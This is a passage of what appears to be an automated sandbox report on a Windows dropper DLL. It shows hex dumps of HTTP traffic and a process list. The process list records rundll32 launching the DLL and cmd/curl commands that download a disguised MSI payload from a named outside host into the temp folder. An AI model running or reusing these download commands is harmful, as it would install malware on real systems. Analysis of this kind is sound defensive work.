                                                  Nov 30, 2022 00:37:08.900918961 CET144INData Raw: 00 b7 00 00 00 b8 00 00 00 b9 00 00 00 ba 00 00 00 bb 00 00 00 bc 00 00 00 bd 00 00 00 be 00 00 00 bf 00 00 00 c0 00 00 00 c1 00 00 00 c2 00 00 00 c3 00 00 00 c4 00 00 00 c5 00 00 00 c6 00 00 00 c7 00 00 00 c8 00 00 00 c9 00 00 00 ca 00 00 00 cb
                                                  Data Ascii:
                                                  Nov 30, 2022 00:37:08.900965929 CET145INData Raw: 01 00 00 f9 01 00 00 fa 01 00 00 fb 01 00 00 fc 01 00 00 fd 01 00 00 fe 01 00 00 ff 01 00 00 00 02 00 00 01 02 00 00 02 02 00 00 03 02 00 00 04 02 00 00 05 02 00 00 06 02 00 00 07 02 00 00 08 02 00 00 09 02 00 00 0a 02 00 00 0b 02 00 00 0c 02 00
                                                  Data Ascii: !"#$%&'()*+,-./01234
                                                  Nov 30, 2022 00:37:08.901011944 CET147INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                  Data Ascii:
                                                  Nov 30, 2022 00:37:08.901058912 CET148INData Raw: 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 30 00 00 00 00 00 00 00 40 48 ca 41 30 43 b1 3f 12 3f 28 45 38 42 b1 41 28 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: *0@HA0C??(E8BA(H+@HAEFAE(?(E8BA(H
                                                  Nov 30, 2022 00:37:08.901103973 CET149INData Raw: 00 00 00 00 00 34 00 00 00 04 00 00 00 00 00 00 00 40 48 59 45 f2 44 68 45 37 47 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c
                                                  Data Ascii: 4@HYEDhE7GXTC1A5G~AG`ED3B'?EDYEB5A0H
                                                  Nov 30, 2022 00:37:08.901150942 CET151INData Raw: 00 00 00 c0 04 00 00 00 00 00 00 40 48 3f 3f 77 45 6c 44 6a 3b e4 45 24 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 02 01 09 00 00
                                                  Data Ascii: @H??wElDj;E$H!DocumentSummaryInformation8
                                                  Nov 30, 2022 00:37:09.113126993 CET166INData Raw: 00 40 00 00 00 41 00 00 00 42 00 00 00 43 00 00 00 44 00 00 00 45 00 00 00 46 00 00 00 47 00 00 00 48 00 00 00 49 00 00 00 4a 00 00 00 fe ff ff ff 4c 00 00 00 4d 00 00 00 4e 00 00 00 4f 00 00 00 50 00 00 00 51 00 00 00 52 00 00 00 53 00 00 00 54
                                                  Data Ascii: @ABCDEFGHIJLMNOPQRSTUY[\`a


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.349698191.252.51.1280C:\Windows\System32\curl.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Nov 30, 2022 00:37:08.837131977 CET137OUTGET /UIServices.jpg HTTP/1.1
                                                  Host: anydesk10.hospedagemdesites.ws
                                                  User-Agent: curl/7.55.1
                                                  Accept: */*
                                                  Nov 30, 2022 00:37:09.049107075 CET152INHTTP/1.1 200 OK
                                                  Date: Tue, 29 Nov 2022 23:33:03 GMT
                                                  Server: Apache
                                                  Last-Modified: Sun, 27 Nov 2022 21:40:24 GMT
                                                  Content-Length: 2719744
                                                  Content-Type: image/jpeg
                                                  Cache-Control: No-Cache
                                                  Pragma: no-cache
                                                  X-Varnish: 192696971 191871687
                                                  Age: 245
                                                  Via: 1.1 varnish-v4
                                                  Accept-Ranges: bytes
                                                  Connection: keep-alive
                                                  Data Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 04 00 fe ff 0c 00 06 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 02 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: >
                                                  Nov 30, 2022 00:37:09.049144983 CET154INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Nov 30, 2022 00:37:09.049166918 CET155INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Nov 30, 2022 00:37:09.049186945 CET156INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Nov 30, 2022 00:37:09.049210072 CET157INData Raw: 00 b7 00 00 00 b8 00 00 00 b9 00 00 00 ba 00 00 00 bb 00 00 00 bc 00 00 00 bd 00 00 00 be 00 00 00 bf 00 00 00 c0 00 00 00 c1 00 00 00 c2 00 00 00 c3 00 00 00 c4 00 00 00 c5 00 00 00 c6 00 00 00 c7 00 00 00 c8 00 00 00 c9 00 00 00 ca 00 00 00 cb
                                                  Data Ascii:
                                                  Nov 30, 2022 00:37:09.049228907 CET159INData Raw: 01 00 00 f9 01 00 00 fa 01 00 00 fb 01 00 00 fc 01 00 00 fd 01 00 00 fe 01 00 00 ff 01 00 00 00 02 00 00 01 02 00 00 02 02 00 00 03 02 00 00 04 02 00 00 05 02 00 00 06 02 00 00 07 02 00 00 08 02 00 00 09 02 00 00 0a 02 00 00 0b 02 00 00 0c 02 00
                                                  Data Ascii: !"#$%&'()*+,-./01234
                                                  Nov 30, 2022 00:37:09.049249887 CET160INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                  Data Ascii:
                                                  Nov 30, 2022 00:37:09.049272060 CET162INData Raw: 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 30 00 00 00 00 00 00 00 40 48 ca 41 30 43 b1 3f 12 3f 28 45 38 42 b1 41 28 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: *0@HA0C??(E8BA(H+@HAEFAE(?(E8BA(H
                                                  Nov 30, 2022 00:37:09.049293995 CET163INData Raw: 00 00 00 00 00 34 00 00 00 04 00 00 00 00 00 00 00 40 48 59 45 f2 44 68 45 37 47 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c
                                                  Data Ascii: 4@HYEDhE7GXTC1A5G~AG`ED3B'?EDYEB5A0H
                                                  Nov 30, 2022 00:37:09.049315929 CET164INData Raw: 00 00 00 c0 04 00 00 00 00 00 00 40 48 3f 3f 77 45 6c 44 6a 3b e4 45 24 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 02 01 09 00 00
                                                  Data Ascii: @H??wElDj;E$H!DocumentSummaryInformation8
                                                  Nov 30, 2022 00:37:09.261426926 CET192INData Raw: 00 40 00 00 00 41 00 00 00 42 00 00 00 43 00 00 00 44 00 00 00 45 00 00 00 46 00 00 00 47 00 00 00 48 00 00 00 49 00 00 00 4a 00 00 00 fe ff ff ff 4c 00 00 00 4d 00 00 00 4e 00 00 00 4f 00 00 00 50 00 00 00 51 00 00 00 52 00 00 00 53 00 00 00 54
                                                  Data Ascii: @ABCDEFGHIJLMNOPQRSTUY[\`a


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.349699191.252.51.1280C:\Windows\System32\curl.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Nov 30, 2022 00:37:11.374049902 CET2471OUTGET /UIServices.jpg HTTP/1.1
                                                  Host: anydesk10.hospedagemdesites.ws
                                                  User-Agent: curl/7.55.1
                                                  Accept: */*
                                                  Nov 30, 2022 00:37:11.587068081 CET2846INHTTP/1.1 200 OK
                                                  Date: Tue, 29 Nov 2022 23:33:03 GMT
                                                  Server: Apache
                                                  Last-Modified: Sun, 27 Nov 2022 21:40:24 GMT
                                                  Content-Length: 2719744
                                                  Content-Type: image/jpeg
                                                  Cache-Control: No-Cache
                                                  Pragma: no-cache
                                                  X-Varnish: 187291835 191871687
                                                  Age: 248
                                                  Via: 1.1 varnish-v4
                                                  Accept-Ranges: bytes
                                                  Connection: keep-alive
                                                  Data Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 04 00 fe ff 0c 00 06 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 02 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: >
                                                  Nov 30, 2022 00:37:11.587088108 CET2847INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Nov 30, 2022 00:37:11.587102890 CET2848INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Nov 30, 2022 00:37:11.587121964 CET2850INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Nov 30, 2022 00:37:11.587161064 CET2851INData Raw: 00 b7 00 00 00 b8 00 00 00 b9 00 00 00 ba 00 00 00 bb 00 00 00 bc 00 00 00 bd 00 00 00 be 00 00 00 bf 00 00 00 c0 00 00 00 c1 00 00 00 c2 00 00 00 c3 00 00 00 c4 00 00 00 c5 00 00 00 c6 00 00 00 c7 00 00 00 c8 00 00 00 c9 00 00 00 ca 00 00 00 cb
                                                  Data Ascii:
                                                  Nov 30, 2022 00:37:11.587179899 CET2852INData Raw: 01 00 00 f9 01 00 00 fa 01 00 00 fb 01 00 00 fc 01 00 00 fd 01 00 00 fe 01 00 00 ff 01 00 00 00 02 00 00 01 02 00 00 02 02 00 00 03 02 00 00 04 02 00 00 05 02 00 00 06 02 00 00 07 02 00 00 08 02 00 00 09 02 00 00 0a 02 00 00 0b 02 00 00 0c 02 00
                                                  Data Ascii: !"#$%&'()*+,-./01234
                                                  Nov 30, 2022 00:37:11.587198973 CET2854INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                  Data Ascii:
                                                  Nov 30, 2022 00:37:11.587219954 CET2855INData Raw: 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 30 00 00 00 00 00 00 00 40 48 ca 41 30 43 b1 3f 12 3f 28 45 38 42 b1 41 28 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: *0@HA0C??(E8BA(H+@HAEFAE(?(E8BA(H
                                                  Nov 30, 2022 00:37:11.587239027 CET2856INData Raw: 00 00 00 00 00 34 00 00 00 04 00 00 00 00 00 00 00 40 48 59 45 f2 44 68 45 37 47 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c
                                                  Data Ascii: 4@HYEDhE7GXTC1A5G~AG`ED3B'?EDYEB5A0H
                                                  Nov 30, 2022 00:37:11.587258101 CET2858INData Raw: 00 00 00 c0 04 00 00 00 00 00 00 40 48 3f 3f 77 45 6c 44 6a 3b e4 45 24 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 02 01 09 00 00
                                                  Data Ascii: @H??wElDj;E$H!DocumentSummaryInformation8
                                                  Nov 30, 2022 00:37:11.800178051 CET3211INData Raw: 00 40 00 00 00 41 00 00 00 42 00 00 00 43 00 00 00 44 00 00 00 45 00 00 00 46 00 00 00 47 00 00 00 48 00 00 00 49 00 00 00 4a 00 00 00 fe ff ff ff 4c 00 00 00 4d 00 00 00 4e 00 00 00 4f 00 00 00 50 00 00 00 51 00 00 00 52 00 00 00 53 00 00 00 54
                                                  Data Ascii: @ABCDEFGHIJLMNOPQRSTUY[\`a


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:00:37:06
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\loaddll64.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll"
                                                  Imagebase:0x7ff71a0e0000
                                                  File size:139776 bytes
                                                  MD5 hash:C676FC0263EDD17D4CE7D644B8F3FCD6
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:1
                                                  Start time:00:37:06
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:2
                                                  Start time:00:37:06
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
                                                  Imagebase:0x7ff707bb0000
                                                  File size:273920 bytes
                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:3
                                                  Start time:00:37:06
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\rundll32.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen
                                                  Imagebase:0x7ff621870000
                                                  File size:69632 bytes
                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:4
                                                  Start time:00:37:06
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\rundll32.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
                                                  Imagebase:0x7ff621870000
                                                  File size:69632 bytes
                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:5
                                                  Start time:00:37:06
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
                                                  Imagebase:0x7ff707bb0000
                                                  File size:273920 bytes
                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:6
                                                  Start time:00:37:06
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
                                                  Imagebase:0x7ff707bb0000
                                                  File size:273920 bytes
                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:7
                                                  Start time:00:37:07
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:8
                                                  Start time:00:37:07
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:9
                                                  Start time:00:37:07
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\curl.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
                                                  Imagebase:0x7ff768f50000
                                                  File size:424448 bytes
                                                  MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  Target ID:10
                                                  Start time:00:37:07
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\curl.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
                                                  Imagebase:0x7ff768f50000
                                                  File size:424448 bytes
                                                  MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:11
                                                  Start time:00:37:09
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\rundll32.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen
                                                  Imagebase:0x7ff621870000
                                                  File size:69632 bytes
                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:12
                                                  Start time:00:37:09
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
                                                  Imagebase:0x7ff707bb0000
                                                  File size:273920 bytes
                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:13
                                                  Start time:00:37:10
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff745070000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:14
                                                  Start time:00:37:10
                                                  Start date:30/11/2022
                                                  Path:C:\Windows\System32\curl.exe
                                                  Wow64 process (32bit):false
